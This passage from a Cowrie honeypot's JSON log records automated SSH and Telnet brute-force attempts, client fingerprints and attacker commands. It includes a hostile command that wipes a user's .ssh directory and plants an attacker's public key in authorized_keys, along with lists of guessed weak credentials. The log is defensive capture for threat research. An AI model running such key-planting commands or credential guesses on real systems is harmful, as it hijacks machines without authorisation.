.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:06:56.357175Z","src_ip":"212.227.235.229","session":"c6712963f0b2"}
{"eventid":"cowrie.login.failed","username":"mysql","password":"password1","message":"login attempt [mysql/password1] failed","sensor":"my-vps","timestamp":"2025-08-31T04:06:58.145476Z","src_ip":"212.227.125.160","session":"184b0d79667b"}
{"eventid":"cowrie.session.closed","duration":"3.6","message":"Connection lost after 3.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:06:59.602031Z","src_ip":"212.227.125.160","session":"184b0d79667b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T04:07:04.802246Z","src_ip":"212.227.125.160","session":"ebde1033958d"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T04:07:04.803110Z","src_ip":"212.227.125.160","session":"ebde1033958d"}
{"eventid":"cowrie.session.closed","duration":"301.3","message":"Connection lost after 301.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:07:10.989509Z","src_ip":"212.227.235.229","session":"f0eb143f8464"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"8.4","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 8.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:07:13.171731Z","src_ip":"212.227.125.160","session":"ebde1033958d"}
{"eventid":"cowrie.session.closed","duration":"69.3","message":"Connection lost after 69.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:07:13.173046Z","src_ip":"212.227.125.160","session":"ebde1033958d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T04:07:14.408225Z","src_ip":"79.127.48.196","session":"bbc009b28871"}
{"eventid":"cowrie.command.input","input":"ls -la /","message":"CMD: ls -la /","sensor":"my-vps","timestamp":"2025-08-31T04:07:14.409068Z","src_ip":"79.127.48.196","session":"bbc009b28871"}
{"eventid":"cowrie.login.success","username":"root","password":"1qaz2wsx","message":"login attempt [root/1qaz2wsx] succeeded","sensor":"my-vps","timestamp":"2025-08-31T04:07:17.652814Z","src_ip":"212.227.235.229","session":"c6712963f0b2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/352110e27ca54240da15349cfe3b896942c0edeb85990b5868f21c885813869f","size":1347,"shasum":"352110e27ca54240da15349cfe3b896942c0edeb85990b5868f21c885813869f","duplicate":true,"duration":"8.1","message":"Closing TTY Log: var/lib/cowrie/tty/352110e27ca54240da15349cfe3b896942c0edeb85990b5868f21c885813869f after 8.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:07:22.496026Z","src_ip":"79.127.48.196","session":"bbc009b28871"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T04:07:27.606256Z","src_ip":"212.227.235.229","session":"c6712963f0b2"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T04:07:27.607094Z","src_ip":"212.227.235.229","session":"c6712963f0b2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"2.9","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:07:30.517235Z","src_ip":"212.227.235.229","session":"c6712963f0b2"}
{"eventid":"cowrie.session.closed","duration":"41.3","message":"Connection lost after 41.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:07:30.533475Z","src_ip":"212.227.235.229","session":"c6712963f0b2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33104,"dst_ip":"1.2.3.4","dst_port":22,"session":"8ea6543ceec7","protocol":"ssh","message":"New connection: 212.227.125.160:33104 (1.2.3.4:22) [session: 8ea6543ceec7]","sensor":"my-vps","timestamp":"2025-08-31T04:07:31.237377Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:07:34.124469Z","src_ip":"212.227.125.160","session":"8ea6543ceec7"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:07:34.156303Z","src_ip":"212.227.125.160","session":"8ea6543ceec7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44252,"dst_ip":"1.2.3.4","dst_port":22,"session":"e505407df872","protocol":"ssh","message":"New connection: 212.227.235.229:44252 (1.2.3.4:22) [session: e505407df872]","sensor":"my-vps","timestamp":"2025-08-31T04:07:34.341520Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:07:35.031638Z","src_ip":"212.227.235.229","session":"e505407df872"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T04:07:35.032817Z","src_ip":"212.227.235.229","session":"e505407df872"}
{"eventid":"cowrie.session.closed","duration":"127.0","message":"Connection lost after 127.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:07:38.087912Z","src_ip":"79.127.48.196","session":"bbc009b28871"}
{"eventid":"cowrie.login.failed","username":"mysql","password":"admin123","message":"login attempt [mysql/admin123] failed","sensor":"my-vps","timestamp":"2025-08-31T04:07:40.896526Z","src_ip":"212.227.235.229","session":"e505407df872"}
{"eventid":"cowrie.session.closed","duration":"8.3","message":"Connection lost after 8.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:07:42.681032Z","src_ip":"212.227.235.229","session":"e505407df872"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47837,"dst_ip":"1.2.3.4","dst_port":23,"session":"c505f992d055","protocol":"telnet","message":"New connection: 212.227.235.229:47837 (1.2.3.4:23) [session: c505f992d055]","sensor":"my-vps","timestamp":"2025-08-31T04:07:43.715456Z"}
{"eventid":"cowrie.login.failed","username":"uftp","password":"uftp123","message":"login attempt [uftp/uftp123] failed","sensor":"my-vps","timestamp":"2025-08-31T04:07:46.696869Z","src_ip":"212.227.125.160","session":"8ea6543ceec7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36034,"dst_ip":"1.2.3.4","dst_port":22,"session":"a730807b9726","protocol":"ssh","message":"New connection: 212.227.235.229:36034 (1.2.3.4:22) [session: a730807b9726]","sensor":"my-vps","timestamp":"2025-08-31T04:07:48.889612Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:07:49.031725Z","src_ip":"212.227.235.229","session":"a730807b9726"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:07:49.033165Z","src_ip":"212.227.235.229","session":"a730807b9726"}
{"eventid":"cowrie.session.closed","duration":"19.1","message":"Connection lost after 19.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:07:50.367943Z","src_ip":"212.227.125.160","session":"8ea6543ceec7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34160,"dst_ip":"1.2.3.4","dst_port":22,"session":"4ae0acdec19d","protocol":"ssh","message":"New connection: 212.227.125.160:34160 (1.2.3.4:22) [session: 4ae0acdec19d]","sensor":"my-vps","timestamp":"2025-08-31T04:07:55.760902Z"}
{"eventid":"cowrie.login.failed","username":"uftp","password":"uftp123","message":"login attempt [uftp/uftp123] failed","sensor":"my-vps","timestamp":"2025-08-31T04:07:55.796572Z","src_ip":"212.227.235.229","session":"a730807b9726"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:07:56.174246Z","src_ip":"212.227.125.160","session":"4ae0acdec19d"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T04:07:56.175126Z","src_ip":"212.227.125.160","session":"4ae0acdec19d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48800,"dst_ip":"1.2.3.4","dst_port":23,"session":"2ec870681509","protocol":"telnet","message":"New connection: 212.227.125.160:48800 (1.2.3.4:23) [session: 2ec870681509]","sensor":"my-vps","timestamp":"2025-08-31T04:07:56.891433Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-31T04:07:56.975363Z","src_ip":"212.227.125.160","session":"2ec870681509"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T04:07:56.991862Z","src_ip":"212.227.125.160","session":"2ec870681509"}
{"eventid":"cowrie.login.failed","username":"mysql","password":"admin123","message":"login attempt [mysql/admin123] failed","sensor":"my-vps","timestamp":"2025-08-31T04:07:58.661510Z","src_ip":"212.227.125.160","session":"4ae0acdec19d"}
{"eventid":"cowrie.session.closed","duration":"9.9","message":"Connection lost after 9.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:07:58.749311Z","src_ip":"212.227.235.229","session":"a730807b9726"}
{"eventid":"cowrie.session.closed","duration":"4.5","message":"Connection lost after 4.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:08:00.250815Z","src_ip":"212.227.125.160","session":"4ae0acdec19d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41496,"dst_ip":"1.2.3.4","dst_port":22,"session":"61db85e8329d","protocol":"ssh","message":"New connection: 212.227.125.160:41496 (1.2.3.4:22) [session: 61db85e8329d]","sensor":"my-vps","timestamp":"2025-08-31T04:08:06.495029Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:08:10.779329Z","src_ip":"212.227.125.160","session":"61db85e8329d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:08:10.829351Z","src_ip":"212.227.125.160","session":"61db85e8329d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33028,"dst_ip":"1.2.3.4","dst_port":22,"session":"bfd3e9638eaa","protocol":"ssh","message":"New connection: 212.227.235.229:33028 (1.2.3.4:22) [session: bfd3e9638eaa]","sensor":"my-vps","timestamp":"2025-08-31T04:08:11.183580Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T04:08:11.185140Z","src_ip":"212.227.235.229","session":"bfd3e9638eaa"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T04:08:11.498500Z","src_ip":"212.227.235.229","session":"bfd3e9638eaa"}
{"eventid":"cowrie.login.success","username":"root","password":"abc12","message":"login attempt [root/abc12] succeeded","sensor":"my-vps","timestamp":"2025-08-31T04:08:13.193791Z","src_ip":"212.227.235.229","session":"bfd3e9638eaa"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T04:08:14.310605Z","src_ip":"212.227.235.229","session":"bfd3e9638eaa"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T04:08:14.311357Z","src_ip":"212.227.235.229","session":"bfd3e9638eaa"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T04:08:14.312283Z","src_ip":"212.227.235.229","session":"bfd3e9638eaa"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:08:14.624785Z","src_ip":"212.227.235.229","session":"bfd3e9638eaa"}
{"eventid":"cowrie.session.closed","duration":31.434988737106323,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:08:15.150374Z","src_ip":"212.227.235.229","session":"c505f992d055"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T04:08:15.314797Z","src_ip":"212.227.235.229","session":"bfd3e9638eaa"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T04:08:15.315502Z","src_ip":"212.227.235.229","session":"bfd3e9638eaa"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T04:08:15.629007Z","src_ip":"212.227.235.229","session":"bfd3e9638eaa"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:08:15.629975Z","src_ip":"212.227.235.229","session":"bfd3e9638eaa"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42614,"dst_ip":"1.2.3.4","dst_port":22,"session":"8609d359d991","protocol":"ssh","message":"New connection: 212.227.235.229:42614 (1.2.3.4:22) [session: 8609d359d991]","sensor":"my-vps","timestamp":"2025-08-31T04:08:15.954013Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T04:08:15.954813Z","src_ip":"212.227.235.229","session":"8609d359d991"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-n